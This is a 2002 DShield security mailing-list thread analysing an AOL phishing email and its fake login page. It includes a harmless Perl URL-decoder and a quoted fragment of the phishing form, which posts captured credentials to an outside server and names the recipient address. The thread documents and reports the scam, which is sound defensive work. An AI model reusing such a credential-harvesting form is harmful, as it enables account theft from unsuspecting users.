[Dshield] OT?: some stuff, a firewall won't catch

Johannes Ullrich jullrich at euclidian.com
Fri Nov 15 23:10:48 GMT 2002


already did... but there is little AOL can do. I also send a note
to the site hosting the page... but haven't done anything yet about the 
email recipient.


On Fri, 15 Nov 2002 16:18:30 -0600
"Doug" <doug at dwhite.ws> wrote:

> You should forward that stuff to AOL
> 
> They will go after them big time!
> 
> ================================
> This address is filtered through the open relay database at
> http://www.ordb.org
> and is virus scanned by ANTIVIR
> http://www.dwhite.ws
> mailto:doug at dwhite.ws
> ================================
> ----- Original Message -----
> From: "Patrick Oonk" <patrick.oonk at pine.nl>
> To: <list at dshield.org>
> Cc: <abuse at aol.com>; <abuse at verio.net>; <abuse at swbell.net>
> Sent: Friday, November 15, 2002 1:34 PM
> Subject: Re: [Dshield] OT?: some stuff, a firewall won't
> catch
> 
> 
> | On Fri, Nov 15, 2002 at 11:09:17AM -0500, Bernd Loske
> wrote:
> | > First:
> | > It's your own fault, if you really go to the site below
> and try to log in
> | > with your account/password -- you have been warned.
> |
> | The page is 'encrypted' using URl encoding.
> |
> | I used the following simple perl script (tnx to
> | http://tech-web.net/perl_memo.html)  to decode it.
> |
> | foreach(<>) {
> |   print URLd($_);
> | }
> |
> | sub URLd{
> | my $URLdecode=shift;
> | $URLdecode=~tr/+/ /;
> | $URLdecode=~s/%([a-fA-F0-9]{2})/pack("C",hex($1))/eg;
> | return $URLdecode;}
> |
> | $ perl ud < index.html |more
> |
> | The most noticable part is the following:
> |
> | <form action="http://64.143.44.63/cgi-local/crow.cgi"
> | method="POST"name="login">^M
> | ^M
> | ^M
> | <!-- This is the email where they go -->^M
> | ^M
> | <input type="hidden" name="recipient"
> | value="JoshuaKneeland at email.com">^M
> | ^M
> | <!-- This is the email where they go.. end. -->^M
> | ^M
> | ^M
> | ^M
> | <input type="hidden"^M
> |     name="subject" value="gp says kristi is god"><input^M
> |     type="hidden" name="redirect"^M
> |     value="http://love.aol.com/LoveMain/"><input
> type="hidden"^M
> |     name="phish" value><table border="0" cellpadding="2"^M
> |     cellspacing="0" align="center">^M
> |
> | Also notice the CR's to end lines and the fact that parts
> of
> | it are created with Frontpage: the signs of a true loser.
> |
> | Patrick
> |
> | >
> | > I found the email below in the inbox of my AOL account (
> yeap - still have
> | > that) this morning. I usually would have deleted it
> right away, but I was
> | > curious about what these spammers try now, to get your
> time and money. So --
> | > fire up lynx and go to the referenced page -- well --
> after getting the
> | > source and making it readable, it revealed a nice piece
> of social
> | > engineering. The casual observer might really think,
> that he logs in into
> | > AOL. And in doing so, his/her account/password gets
> posted to some web
> | > server in the process. I wonder how many AOL accounts
> got compromised ? ...
> | >
> | > How do you catch that, except telling everybody over and
> over, not to click
> | > on links, to trust nobody and that the internet became a
> bad place to be?
> | >
> | >
> | >
> | >
> | > -----Original Message-----
> | > From: RuffRyderLK at aol.com [mailto:RuffRyderLK at aol.com]
> | > Sent: Thursday, November 14, 2002 7:08 PM
> | > To: undisclosed-recipients:
> | > Subject: You have an admirer!
> | >
> | >
> | > Someone has sent you a secret message. <A
> | > HREF=http://members.truepath.com/vegazisfun/>Click here
> to redeem your
> | > message now!</A>
> | >
> | > _______________________________________________
> | > Dshield mailing list
> | > Dshield at dshield.org
> | > To change your subscription options (or unsubscribe),
> see: http://www.dshield.org/mailman/listinfo/list
> |
> | --
> |  Patrick Oonk    -   Pine Digital Security    -
> patrick.oonk at pine.nl
> |  T:+31-70-3111010 - F:+31-70-3111011 - Read news at
> http://security.nl
> |  PGPid A4E74BBF  fp A7CF 7611 E8C4 7B79 CA36  0BFD 2CB4
> 7283 A4E7 4BBF
> |                   One thing less to worry about...
> |  Excuse of the day: Electricians made popcorn in the power
> supply
> |
> | _______________________________________________
> | Dshield mailing list
> | Dshield at dshield.org
> | To change your subscription options (or unsubscribe), see:
> http://www.dshield.org/mailman/listinfo/list
> 
> _______________________________________________
> Dshield mailing list
> Dshield at dshield.org
> To change your subscription options (or unsubscribe), see:
> http://www.dshield.org/mailman/listinfo/list
> 


-- 
--------------------------------------------------------------------
jullrich at euclidian.com             Collaborative Intrusion Detection
                                         join http://www.dshield.org
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: not available
Url : http://www.dshield.org/pipermail/list/attachments/20021115/3e6912ff/attachment.bin


More information about the list mailing list